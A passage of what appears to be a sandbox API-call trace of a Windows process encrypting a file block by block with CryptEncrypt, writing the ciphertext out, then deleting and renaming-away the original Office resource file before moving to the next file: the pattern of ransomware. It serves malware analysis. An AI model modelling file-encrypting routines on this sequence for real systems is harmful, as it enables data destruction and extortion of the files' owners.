nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.945] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.945] GetLastError () returned 0x0 [0160.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.946] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.946] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.946] GetLastError () returned 0x0 [0160.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.946] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.946] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.946] GetLastError () returned 0x0 [0160.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.946] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.946] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.946] GetLastError () returned 0x0 [0160.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.946] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.946] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.946] GetLastError () returned 0x0 [0160.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.946] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.946] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.946] GetLastError () returned 0x0 [0160.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.946] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.946] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.946] GetLastError () returned 0x0 [0160.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.947] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.947] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.947] GetLastError () returned 0x0 [0160.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.947] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.947] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.947] GetLastError () returned 0x0 [0160.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.947] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.947] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.947] GetLastError () returned 0x0 [0160.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.947] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.947] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.947] GetLastError () returned 0x0 [0160.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.947] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.947] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.947] GetLastError () returned 0x0 [0160.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.947] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.947] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.948] GetLastError () returned 0x0 [0160.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.948] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.948] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.948] GetLastError () returned 0x0 [0160.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.948] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.948] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.948] GetLastError () returned 0x0 [0160.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.948] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.948] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.948] GetLastError () returned 0x0 [0160.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.948] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.948] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.948] GetLastError () returned 0x0 [0160.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.948] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.948] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.948] GetLastError () returned 0x0 [0160.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.948] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.948] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.948] GetLastError () returned 0x0 [0160.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.948] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.949] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.949] GetLastError () returned 0x0 [0160.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.949] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.949] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.949] GetLastError () returned 0x0 [0160.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.949] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.949] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.949] GetLastError () returned 0x0 [0160.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.949] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.949] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.949] GetLastError () returned 0x0 [0160.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.949] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.949] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.949] GetLastError () returned 0x0 [0160.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.949] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.949] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.949] GetLastError () returned 0x0 [0160.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.949] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.950] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.950] GetLastError () returned 0x0 [0160.950] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.950] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.950] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.950] GetLastError () returned 0x0 [0160.950] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.950] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.950] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.950] GetLastError () returned 0x0 [0160.950] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.950] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.950] WriteFile (in: hFile=0x588, lpBuffer=0x2901230*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.950] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui")) returned 0x20 [0160.950] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.951] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui") returned 1 [0160.951] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui")) returned 0 [0160.951] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" [0160.951] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 1 [0160.951] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\.xXE808.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\.xxe808.tmp")) returned 0xe808 [0160.971] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\.xXE808.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\.xxe808.tmp"), dwFlags=0x1) returned 0 [0160.972] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\.xXE808.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\.xxe808.tmp")) returned 1 [0160.972] CryptDestroyKey (hKey=0x9ad638) returned 1 [0160.972] wcslen (_String="OK") returned 0x2 [0160.972] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.972] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.972] CryptDestroyKey (hKey=0x9ad478) returned 1 [0160.972] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0160.972] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0160.972] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.972] GetLastError () returned 0x12 